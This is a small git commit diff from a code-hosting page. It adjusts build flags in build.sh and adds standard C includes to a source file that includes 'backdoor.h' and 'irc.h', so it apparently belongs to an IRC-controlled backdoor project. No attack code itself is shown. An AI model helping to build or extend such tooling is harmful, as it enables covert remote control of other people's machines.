fixed
This commit is contained in:
parent
69bc238a38
commit
6f5a7c00c1
4
build.sh
4
build.sh
@ -1,3 +1,3 @@
|
||||
CFLAGS="-s -Os -pedantic -Wall -Wextra -static"
|
||||
CFLAGS="-s -Os -pedantic -Wall -Wextra"
|
||||
|
||||
cc $CFLAGS src/* -Iinclude -DENABLE_SSL -lssl -lcrypto -omain -DVAL1=$RANDOM -DVAL2=$RANDOM
|
||||
cc $CFLAGS src/* -Iinclude -lssl -lcrypto -DENABLE_SSL -DVAL1=$RANDOM -DVAL2=$RANDOM -omain
|
||||
|
@ -1,3 +1,6 @@
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include "backdoor.h"
|
||||
#include "irc.h"
|
||||
|
Loading…
Reference in New Issue
Block a user